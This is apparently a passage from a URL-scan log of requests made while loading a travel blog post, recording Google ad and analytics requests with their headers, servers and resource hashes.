report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=kUWgxajF5w%2FTh5vu4apo1twKCL9VAZ5lr1%2BPNWjToyP74hIb1B3gYQ%2BuwoltOhf6F1uAkHmSZ5ut8%2FAcVAipEWi1fLDN4%2FD89onugieSX3HETAE%2BfQp0IT%2Fw%2Bf6hrhU%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: image/png
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
accept-ranges: bytes
cf-ray: 6396de2d3fc84ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

GET
H2 200 zrt_lookup.html Show response
googleads.g.doubleclick.net/pagead/html/r20210331/r20190131/ Frame 07D3 10 KB
5 KB 6ms
6ms Document
text/html 2a00:1450:4001:808::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://googleads.g.doubleclick.net/pagead/html/r20210331/r20190131/zrt_lookup.html

Requested by

Host: pagead2.googlesyndication.com
URL: https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2a00:1450:4001:808::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

7ee8a97200cf0e24af175070d017d0bdabe6c619ede7bf7c5585e90de0f39798

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

:method: GET
:authority: googleads.g.doubleclick.net
:scheme: https
:path: /pagead/html/r20210331/r20190131/zrt_lookup.html
pragma: no-cache
cache-control: no-cache
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.itravelrox.com/
accept-encoding: gzip, deflate, br
accept-language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
Referer: https://www.itravelrox.com/

Response headers

p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
vary: Accept-Encoding
date: Thu, 01 Apr 2021 20:38:57 GMT
expires: Thu, 15 Apr 2021 20:38:57 GMT
content-type: text/html; charset=UTF-8
etag: 13254444762018554669
x-content-type-options: nosniff
content-encoding: gzip
server: cafe
content-length: 4647
x-xss-protection: 0
age: 23528
cache-control: public, max-age=1209600
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"

GET
H2 200 cookie.js Show response
partner.googleadservices.com/gampad/ 204 B
263 B 47ms
41ms Script
text/javascript 142.250.185.130
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://partner.googleadservices.com/gampad/cookie.js?domain=www.itravelrox.com&callback=_gfp_s_&client=ca-pub-6761611880351053

Requested by

Host: pagead2.googlesyndication.com
URL: https://pagead2.googlesyndication.com/pagead/js/r20210331/r20190131/show_ads_impl_with_ama_fy2019.js?client=ca-pub-6761611880351053&plah=www.itravelrox.com&amaexp=1

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

142.250.185.130 , United States, ASN15169 (GOOGLE, US),

Reverse DNS

fra16s50-in-f2.1e100.net

Software

cafe /

Resource Hash

a4017a8fff9f850e0d3b636a245dd755a11ee2cb479075872628cbf05fa0f444

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: gzip
x-content-type-options: nosniff
server: cafe
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
content-type: text/javascript; charset=UTF-8
cache-control: private
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
timing-allow-origin: *
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 194
x-xss-protection: 0

GET
H2 200 integrator.js Show response
adservice.google.de/adsid/ 107 B
165 B 15ms
15ms Script
application/javascript 2a00:1450:4001:801::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://adservice.google.de/adsid/integrator.js?domain=www.itravelrox.com

Requested by

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2a00:1450:4001:801::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

a4a1824defec1084ca81d496ee77891684c26196924bdc4fc21dd3482ce15e14

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

timing-allow-origin: *
date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: gzip
x-content-type-options: nosniff
server: cafe
p3p: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657 for more info."
cache-control: private, no-cache, no-store
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
content-type: application/javascript; charset=UTF-8
alt-svc: h3-29="googleads.g.doubleclick.net:443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051="googleads.g.doubleclick.net:443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050="googleads.g.doubleclick.net:443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046="googleads.g.doubleclick.net:443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043="googleads.g.doubleclick.net:443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="46,43",quic=":443"; ma=2592000; v="46,43"
content-length: 100
x-xss-protection: 0

GET
H2 200 integrator.js Show response
adservice.google.com/adsid/ 107 B
165 B 15ms
15ms Script
application/javascript 2a00:1450:4001:801::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://adservice.google.com/adsid/integrator.js?domain=www.itravelrox.com

Requested by

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2a00:1450:4001:801::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

a4a1824defec1084ca81d496ee77891684c26196924bdc4fc21dd3482ce15e14

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

timing-allow-origin: *
date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: gzip
x-content-type-options: nosniff
server: cafe
p3p: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657 for more info."
cache-control: private, no-cache, no-store
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
content-type: application/javascript; charset=UTF-8
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 100
x-xss-protection: 0

GET
H3-Q050 204 gen_204
pagead2.googlesyndication.com/pagead/ 0
23 B 17ms
16ms Image
image/gif 2a00:1450:4001:812::2002
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://pagead2.googlesyndication.com/pagead/gen_204?id=ach_evt&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&tn=DIV&id=main-nav&cls=navbar%20navbar-inverse%20bs-docs-nav&ign=false

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:812::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

pragma: no-cache
date: Fri, 02 Apr 2021 03:11:05 GMT
x-content-type-options: nosniff
server: cafe
timing-allow-origin: *
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cache-control: no-cache, must-revalidate
cross-origin-resource-policy: cross-origin
content-type: image/gif
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 0
x-xss-protection: 0
expires: Fri, 01 Jan 1990 00:00:00 GMT

GET
H3-Q050 200 ads Show response
googleads.g.doubleclick.net/pagead/ Frame CF6E 7 KB
1 KB 90ms
83ms Document
text/html 2a00:1450:4001:82a::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&adk=1812271804&adf=3025194257&lmt=1617333065&plat=1%3A32776%2C2%3A16809992%2C8%3A134217728%2C9%3A134250504%2C16%3A8388608%2C17%3A32%2C24%3A32%2C25%3A32%2C30%3A34635776%2C32%3A32&format=0x0&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&ea=0&flash=0&pra=5&wgl=1&dt=1617333065726&bpp=19&bdt=225&idt=148&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&nras=1&correlator=8191862741585&frm=20&pv=2&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=-12245933&ady=-12245933&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=2&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=8192&bc=31&ifi=1&uci=a!1&fsb=1&dtd=173

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:82a::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

8177c20d38234ae1d255a7e4dcfdfacfe64f1f134c80ed8df862685b41979427

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

:method: GET
:authority: googleads.g.doubleclick.net
:scheme: https
:path: /pagead/ads?client=ca-pub-6761611880351053&output=html&adk=1812271804&adf=3025194257&lmt=1617333065&plat=1%3A32776%2C2%3A16809992%2C8%3A134217728%2C9%3A134250504%2C16%3A8388608%2C17%3A32%2C24%3A32%2C25%3A32%2C30%3A34635776%2C32%3A32&format=0x0&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&ea=0&flash=0&pra=5&wgl=1&dt=1617333065726&bpp=19&bdt=225&idt=148&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&nras=1&correlator=8191862741585&frm=20&pv=2&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=-12245933&ady=-12245933&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=2&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=8192&bc=31&ifi=1&uci=a!1&fsb=1&dtd=173
pragma: no-cache
cache-control: no-cache
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.itravelrox.com/
accept-encoding: gzip, deflate, br
accept-language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
Referer: https://www.itravelrox.com/

Response headers

p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
content-type: text/html; charset=UTF-8
x-content-type-options: nosniff
content-encoding: br
date: Fri, 02 Apr 2021 03:11:05 GMT
server: cafe
content-length: 980
x-xss-protection: 0
set-cookie: test_cookie=CheckForPermission; expires=Fri, 02-Apr-2021 03:26:05 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
expires: Fri, 02 Apr 2021 03:11:05 GMT
cache-control: private

GET
H2 200 osd.js Show response
www.googletagservices.com/activeview/js/current/ 73 KB
28 KB 19ms
13ms Script
text/javascript 2a00:1450:4001:813::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.googletagservices.com/activeview/js/current/osd.js?cb=%2Fr20100101

Requested by

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2a00:1450:4001:813::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

234e58e81d77759daf07d771662c4e4b7711301f3a867a8bbf78651dfc13c2f6

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: gzip
x-content-type-options: nosniff
server: sffe
etag: "1617218226621639"
vary: Accept-Encoding
content-type: text/javascript
cache-control: private, max-age=3000
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 28276
x-xss-protection: 0
expires: Fri, 02 Apr 2021 03:11:05 GMT

GET
H3-Q050 200 ads Show response
googleads.g.doubleclick.net/pagead/ Frame 3ACD 71 KB
23 KB 515ms
513ms Document
text/html 2a00:1450:4001:82a::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=398161349&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333065&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065745&bpp=57&bdt=244&idt=166&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&prev_fmts=0x0&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=245&ady=1352&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=2&uci=a!2&btvi=1&fsb=1&xpc=G2vAqXg6pL&p=https%3A//www.itravelrox.com&dtd=207

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:82a::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

ce8ade47e93f8838db8b581958e3adaebd578d0b77c9560c2545c883afca317e

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

:method: GET
:authority: googleads.g.doubleclick.net
:scheme: https
:path: /pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=398161349&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333065&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065745&bpp=57&bdt=244&idt=166&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&prev_fmts=0x0&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=245&ady=1352&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=2&uci=a!2&btvi=1&fsb=1&xpc=G2vAqXg6pL&p=https%3A//www.itravelrox.com&dtd=207
pragma: no-cache
cache-control: no-cache
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.itravelrox.com/
accept-encoding: gzip, deflate, br
accept-language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
Referer: https://www.itravelrox.com/

Response headers

p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
content-type: text/html; charset=UTF-8
x-content-type-options: nosniff
content-encoding: br
date: Fri, 02 Apr 2021 03:11:06 GMT
server: cafe
content-length: 23853
x-xss-protection: 0
set-cookie: test_cookie=CheckForPermission; expires=Fri, 02-Apr-2021 03:26:05 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
expires: Fri, 02 Apr 2021 03:11:06 GMT
cache-control: private

GET
H3-Q050 200 ads Show response
googleads.g.doubleclick.net/pagead/ Frame 586B 79 KB
23 KB 410ms
409ms Document
text/html 2a00:1450:4001:82a::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=187&slotname=1101473462&adk=1534294233&adf=336954501&pi=t.ma~as.1101473462&w=745&fwrn=4&lmt=1617333065&rafmt=11&psa=0&format=745x187&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&wgl=1&dt=1617333065802&bpp=2&bdt=301&idt=166&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&prev_fmts=0x0%2C825x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&rplot=4&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=285&ady=2239&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=3&uci=a!3&btvi=2&fsb=1&xpc=ggk2H5poe9&p=https%3A//www.itravelrox.com&dtd=169

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:82a::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

9575bad6191587d84aa75684606c7fcae2a4158923baebaca561c95ea5c059eb

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

:method: GET
:authority: googleads.g.doubleclick.net
:scheme: https
:path: /pagead/ads?client=ca-pub-6761611880351053&output=html&h=187&slotname=1101473462&adk=1534294233&adf=336954501&pi=t.ma~as.1101473462&w=745&fwrn=4&lmt=1617333065&rafmt=11&psa=0&format=745x187&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&wgl=1&dt=1617333065802&bpp=2&bdt=301&idt=166&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&prev_fmts=0x0%2C825x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&rplot=4&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=285&ady=2239&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=3&uci=a!3&btvi=2&fsb=1&xpc=ggk2H5poe9&p=https%3A//www.itravelrox.com&dtd=169
pragma: no-cache
cache-control: no-cache
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.itravelrox.com/
accept-encoding: gzip, deflate, br
accept-language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
Referer: https://www.itravelrox.com/

Response headers

p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
content-type: text/html; charset=UTF-8
x-content-type-options: nosniff
content-encoding: br
date: Fri, 02 Apr 2021 03:11:06 GMT
server: cafe
content-length: 23609
x-xss-protection: 0
set-cookie: test_cookie=CheckForPermission; expires=Fri, 02-Apr-2021 03:26:05 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
expires: Fri, 02 Apr 2021 03:11:06 GMT
cache-control: private

GET
H3-Q050 200 ads Show response
googleads.g.doubleclick.net/pagead/ Frame 28C6 72 KB
24 KB 456ms
456ms Document
text/html 2a00:1450:4001:82a::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=1661042523&adk=605609668&adf=2080630801&pi=t.ma~as.1661042523&w=1200&fwrn=4&fwrnh=100&lmt=1617333065&rafmt=1&to=pso&psa=0&channel=WordPressSinglePost%2Bpso-lv-5&format=1200x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065804&bpp=1&bdt=303&idt=171&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&prev_fmts=0x0%2C825x280%2C745x187&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=200&ady=86&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7CeE%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=4&uci=a!4&fsb=1&xpc=Grt5bJypV6&p=https%3A//www.itravelrox.com&dtd=174

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:82a::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

5c0a701649d831c0a145528067e9ddd6547e744b6e712ab6ff5322ed40d587cb

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

:method: GET
:authority: googleads.g.doubleclick.net
:scheme: https
